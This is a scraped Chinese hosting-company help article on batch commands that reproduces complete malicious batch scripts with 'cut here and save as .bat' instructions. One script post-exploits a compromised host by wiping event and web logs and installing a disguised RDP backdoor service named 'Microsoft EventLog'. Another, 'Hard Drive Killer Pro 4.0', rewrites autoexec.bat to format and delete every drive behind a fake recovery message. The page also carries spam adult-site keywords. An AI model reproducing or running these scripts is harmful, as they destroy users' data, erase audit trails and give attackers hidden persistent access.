1. <var id="fe6gj"></var>

    <rp id="fe6gj"><nav id="fe6gj"></nav></rp>

    <noframes id="fe6gj"><cite id="fe6gj"></cite>

    <ins id="fe6gj"><button id="fe6gj"><p id="fe6gj"></p></button></ins>
    1. <tt id="fe6gj"><i id="fe6gj"><sub id="fe6gj"></sub></i></tt>
        始創于2000年 股票代碼:831685
        咨詢熱線:0371-60135900 注冊有禮 登錄
        • 掛牌上市企業
        • 60秒人工響應
        • 99.99%連通率
        • 7*24h人工
        • 故障100倍補償
        您的位置: 網站首頁 > 幫助中心>文章內容

        批處理內部命令 (4)

        發布時間:  2012/9/7 19:10:16

        -------------
        echo.
        echo OK,delshare.bat has deleted all the share you assigned.
        echo.Any questions ,feel free to mail to Ex4rch@hotmail.com.
        echo
        echo.
        echo ------------------------------------------------------
        echo.
        :EOF
        echo end of the batch file
        ------------------------ cut here then save as .bat or .cmd file ---------------------------

        2.全面加固系統(給肉雞打補。┑呐幚砦募
        ------------------------ cut here then save as .bat or .cmd file ---------------------------
        @echo Windows Registry Editor Version 5.00 >patch.dll
        @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]
        >>patch.dll
        @echo "AutoShareServer"=dword:00000000 >>patch.dll
        @echo "AutoShareWks"=dword:00000000 >>patch.dll
        @REM [禁止共享]
        @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] >>patch.dll
        @echo "restrictanonymous"=dword:00000001 >>patch.dll
        @REM [禁止匿名登錄]
        @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters] >>patch.dll
        @echo "SMBDeviceEnabled"=dword:00000000 >>patch.dll
        @REM [禁止及文件訪問和打印共享]
        @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\@REMoteRegistry] >>patch.dll
        @echo "Start"=dword:00000004 >>patch.dll
        @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule] >>patch.dll
        @echo "Start"=dword:00000004 >>patch.dll
        @echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>patch.dll
        @echo "ShutdownWithoutLogon"="0" >>patch.dll
        @REM [禁止登錄前關機]
        @echo "DontDisplayLastUserName"="1" >>patch.dll
        @REM [禁止顯示前一個登錄用戶名稱]
        @regedit /s patch.dll
        ------------------------ cut here then save as .bat or .cmd file ---------------------------
        下面命令是清除肉雞所有日志,禁止一些危險的服務,并修改肉雞的terminnal service留跳后路。
        @regedit /s patch.dll
        @net stop w3svc
        @net stop event log
        @del c:\winnt\system32\logfiles\w3svc1\*.* /f /q
        @del c:\winnt\system32\logfiles\w3svc2\*.* /f /q
        @del c:\winnt\system32\config\*.event /f /q
        @del c:\winnt\system32dtclog\*.* /f /q
        @del c:\winnt\*.txt /f /q
        @del c:\winnt\*.log /f /q
        @net start w3svc
        @net start event log
        @rem [刪除日志]
        @net stop lanmanserver /y
        @net stop Schedule /y
        @net stop RemoteRegistry /y
        @del patch.dll
        @echo The server has been patched,Have fun.
        @del patch.bat
        @REM [禁止一些危險的服務。]
        @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-
        Tcp] >>patch.dll
        @echo "PortNumber"=dword:00002010 >>patch.dll
        @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds dpwd\Tds\tcp
        >>patch.dll
        @echo "PortNumber"=dword:00002012 >>patch.dll
        @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>patch.dll
        @echo "Start"=dword:00000002 >>patch.dll
        @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService] >>patch.dll
        @echo "Start"=dword:00000002 >>patch.dll
        @echo "ErrorControl"=dword:00000001 >>patch.dll
        @echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
        >>patch.dll
        @echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\
        >>patch.dll
        @echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 >>patch.dll
        @echo "ObjectName"="LocalSystem" >>patch.dll
        @echo "Type"=dword:00000010 >>patch.dll
        @echo "Description"="Keep record of the program and windows' message。" >>patch.dll
        @echo "DisplayName"="Microsoft EventLog" >>patch.dll
        @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\termservice] >>patch.dll
        @echo "Start"=dword:00000004 >>patch.dll
        @copy c:\winnt\system32\termsrv.exe c:\winnt\system32\eventlog.exe
        @REM [修改3389連接,端口為8210(十六進制為00002012),名稱為Microsoft EventLog,留條后路]

        3.Hard Drive Killer Pro Version 4.0(玩批處理到這個水平真的不容易了。)
        ------------------------ cut here then save as .bat or .cmd file ---------------------------
        @echo off
        rem This program is dedecated to a very special person that does not want to be named.
        :start
        cls
        echo PLEASE WAIT WHILE PROGRAM LOADS . . .
        call attrib -r -h c:\autoexec.bat >nul
        echo @echo off >c:\autoexec.bat
        echo call format c: /q /u /autoSample >nul >>c:\autoexec.bat
        call attrib +r +h c:\autoexec.bat >nul
        rem Drive checking and assigning the valid drives to the drive variable.
        set drive=
        set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z
        rem code insertion for Drive Checking takes place here.
        rem drivechk.bat is the file name under the root directory.
        rem As far as the drive detection and drive variable settings, don't worry about how it
        rem works, it's d\*amn to complicated for the average or even the expert batch programmer.
        rem Except for Tom Lavedas.
        echo @echo off >drivechk.bat
        echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" > nul >{t}.bat
        %comspec% /e:2048 /c {t}.bat >>drivechk.bat
        del {t}.bat
        echo if errorlevel 1 goto enddc >>drivechk.bat
        cls
        echo PLEASE WAIT WHILE PROGRAM LOADS . . .
        rem When errorlevel is 1, then the above is not true, if 0, then it's true.
        rem Opposite of binary rules. If 0, it will elaps to the next command.
        echo @prompt %%%%comspec%%%% /f /c dir %%%%1:.\/ad/w/-p $b find "bytes" > nul >{t}.bat
        %comspec% /e:2048 /c {t}.bat >>drivechk.bat
        del {t}.bat
        echo if errorlevel 1 goto enddc >>drivechk.bat
        cls
        echo PLEASE WAIT WHILE PROGRAM LOADS . . .
        rem if errorlevel is 1, then the drive specified is a removable media drive - not ready.
        rem if errorlevel is 0, then it will elaps to the next command.
        echo @prompt dir %%%%1:.\/ad/w/-p $b find " 0 bytes free" > nul >{t}.bat
        %comspec% /e:2048 /c {t}.bat >>drivechk.bat
        del {t}.bat
        echo if errorlevel 1 set drive=%%drive%% %%1 >>drivechk.bat
        cls
        echo PLEASE WAIT WHILE PROGRAM LOADS . . .
        rem if it's errorlevel 1, then the specified drive is a hard or floppy drive.
        rem if it's not errorlevel 1, then the specified drive is a CD-ROM drive.
        echo :enddc >>drivechk.bat
        rem Drive checking insertion ends here. "enddc" stands for "end dDRIVE cHECKING".
        rem Now we will use the program drivechk.bat to attain valid drive information.
        :Sampledrv
        for %%a in (%alldrive%) do call drivechk.bat %%a >nul
        del drivechk.bat >nul
        if %drive.==. set drive=c
        :form_del
        call attrib -r -h c:\autoexec.bat >nul
        echo @echo off >c:\autoexec.bat
        echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . .
        >>c:\autoexec.bat
        echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample >nul >>c:\autoexec.bat
        echo cls >>c:\autoexec.bat
        echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . .
        >>c:\autoexec.bat
        echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat
        echo cls >>c:\autoexec.bat
        echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . .
        >>c:\autoexec.bat
        echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat
        echo cls >>c:\autoexec.bat
        echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . .
        >>c:\autoexec.bat
        echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample >nul >>c:\autoexec.bat
        echo cls >>c:\autoexec.bat
        echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . .
        >>c:\autoexec.bat
        echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat
        echo cls >>c:\autoexec.bat
        echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . .
        >>c:\autoexec.bat
        echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat
        echo cd\ >>c:\autoexec.bat
        echo cls >>c:\autoexec.bat
        echo echo Welcome to the land of death. Munga Bunga's Multiple Hard Drive Killer version 4.0.
        億恩科技地址(ADD):鄭州市黃河路129號天一大廈608室 郵編(ZIP):450008 傳真(FAX):0371-60123888
           聯系:億恩小凡
           QQ:89317007
           電話:0371-63322206


        本文出自:億恩科技【www.endtimedelusion.com】

        服務器租用/服務器托管中國五強!虛擬主機域名注冊頂級提供商!15年品質保障!--億恩科技[ENKJ.COM]

      1. 您可能在找
      2. 億恩北京公司:
      3. 經營性ICP/ISP證:京B2-20150015
      4. 億恩鄭州公司:
      5. 經營性ICP/ISP/IDC證:豫B1.B2-20060070
      6. 億恩南昌公司:
      7. 經營性ICP/ISP證:贛B2-20080012
      8. 服務器/云主機 24小時售后服務電話:0371-60135900
      9. 虛擬主機/智能建站 24小時售后服務電話:0371-60135900
      10. 專注服務器托管17年
        掃掃關注-微信公眾號
        0371-60135900
        Copyright© 1999-2019 ENKJ All Rights Reserved 億恩科技 版權所有  地址:鄭州市高新區翠竹街1號總部企業基地億恩大廈  法律顧問:河南亞太人律師事務所郝建鋒、杜慧月律師   京公網安備41019702002023號
          0
         
         
         
         

        0371-60135900
        7*24小時客服服務熱線

         
         
        av不卡不卡在线观看_最近2018年中文字幕_亚洲欧美一区二区三区_一级A爱做片免费观看国产_日韩在线中文天天更新_伊人中文无码在线